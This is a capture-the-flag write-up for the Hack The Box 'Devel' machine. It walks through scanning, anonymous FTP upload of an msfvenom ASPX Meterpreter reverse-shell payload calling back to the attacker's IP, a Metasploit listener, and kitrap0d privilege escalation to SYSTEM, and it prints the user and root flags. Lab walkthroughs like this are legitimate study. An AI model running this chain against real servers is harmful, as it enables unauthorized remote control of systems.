HTB Devel

 $nmap -T4 -sV -p- -A 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:09 CEST
Nmap scan report for 10.10.10.5
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.17 seconds

Open ports detected:

  • 21/tcp open  ftp     Microsoft ftpd
  • 80/tcp open  http    Microsoft IIS httpd 7.5

 $nikto -h 10.10.10.5

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.5
+ Target Hostname:    10.10.10.5
+ Target Port:        80
+ Start Time:         2020-06-20 11:18:46 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ /: Appears to be a default IIS 7 install.
+ 7863 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-06-20 11:25:09 (GMT2) (383 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$nmap -p 80 --script vuln 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:23 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.045s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 198.66 seconds

$nmap -p 21 --script vuln 10.10.10.5

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:28 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.044s latency).

PORT   STATE SERVICE
21/tcp open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:

Nmap done: 1 IP address (1 host up) scanned in 57.57 seconds

 $gobuster dir -u 10.10.10.5 -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.5
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/20 11:37:21 Starting gobuster
===============================================================
/aspnet_client (Status: 301)
===============================================================
2020/06/20 11:37:53 Finished
===============================================================

Nothing much useful was found until this point.

$ftp 10.10.10.5

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:ruben): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

ftp> put test.txt

local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (344.6691 kB/s)

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
06-23-20  09:00PM                    6 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

So, if we can upload any file, can we upload a reverse shell? An ASP reverse shell?

Search for ASP reverse shell and the first result is: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

ASP Meterpreter Reverse TCP

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9999 -f aspx -o devel.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2813 bytes

ftp> put devel.aspx

Create a listener in Metasploit

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.13

lhost => 10.10.14.13

msf5 exploit(multi/handler) > set lport 9999

lport => 9999

msf5 exploit(multi/handler) > set ExitOnSession false

ExitOnSession => false

msf5 exploit(multi/handler) > exploit -j
Access to http://10.10.10.5/devel.aspx

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.14.13:9999
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.13:9999 -> 10.10.10.5:49157) at 2020-06-24 16:25:48 +0200

sessions -i 1

[*] Starting interaction with 1...
meterpreter >

meterpreter > getuid

Server username: IIS APPPOOL\Web

meterpreter > sysinfo

Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 31 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

meterpreter > background

[*] Backgrounding session 1...

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1

SESSION => 1

msf5 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION                  yes      The session to run this module on.

Exploit target:
  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1

SESSION => 1

msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION  1                yes      The session to run this module on.

Exploit target:

  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.21.129:4444
[*] Launching notepad to host the exploit...
[+] Process 3044 launched.
[*] Reflectively injecting the exploit DLL into 3044...
[*] Injecting exploit into 3044 ...
[*] Exploit injected. Injecting payload into 3044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

msf5 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  SESSION  1                yes      The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    192.168.21.129  yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port

Exploit target:

  Id  Name
  --  ----
  0  Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.13

lhost => 10.10.14.13

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Launching notepad to host the exploit...
[+] Process 4036 launched.
[*] Reflectively injecting the exploit DLL into 4036...
[*] Injecting exploit into 4036 ...
[*] Exploit injected. Injecting payload into 4036...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.5:49160) at 2020-06-24 16:31:44 +0200

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > cd Users
meterpreter > dir

Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx  8192  dir  2017-03-18 00:16:43 +0100  Administrator
40777/rwxrwxrwx  0    dir  2009-07-14 06:53:55 +0200  All Users
40777/rwxrwxrwx  8192  dir  2017-03-18 00:06:26 +0100  Classic .NET AppPool
40555/r-xr-xr-x  8192  dir  2009-07-14 04:37:05 +0200  Default
40777/rwxrwxrwx  0    dir  2009-07-14 06:53:55 +0200  Default User
40555/r-xr-xr-x  4096  dir  2009-07-14 04:37:05 +0200  Public
40777/rwxrwxrwx  8192  dir  2017-03-17 15:17:37 +0100  babis
100666/rw-rw-rw-  174  fil  2009-07-14 06:41:57 +0200  desktop.ini

meterpreter > cd babis/Desktop
meterpreter > dir

Listing: c:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282  fil  2017-03-17 15:17:51 +0100  desktop.ini
100444/r--r--r--  32    fil  2017-03-18 00:14:21 +0100  user.txt.txt

meterpreter > cat user.txt.txt

9ecdd6a3aedf24b41562fea70f4cb3e8

meterpreter > cd ..
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir

Listing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282  fil  2017-03-18 00:16:53 +0100  desktop.ini
100444/r--r--r--  32    fil  2017-03-18 00:17:20 +0100  root.txt.txt

meterpreter > cat root.txt.txt

e621a0b5041708797c4fc4728bc72b4b

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *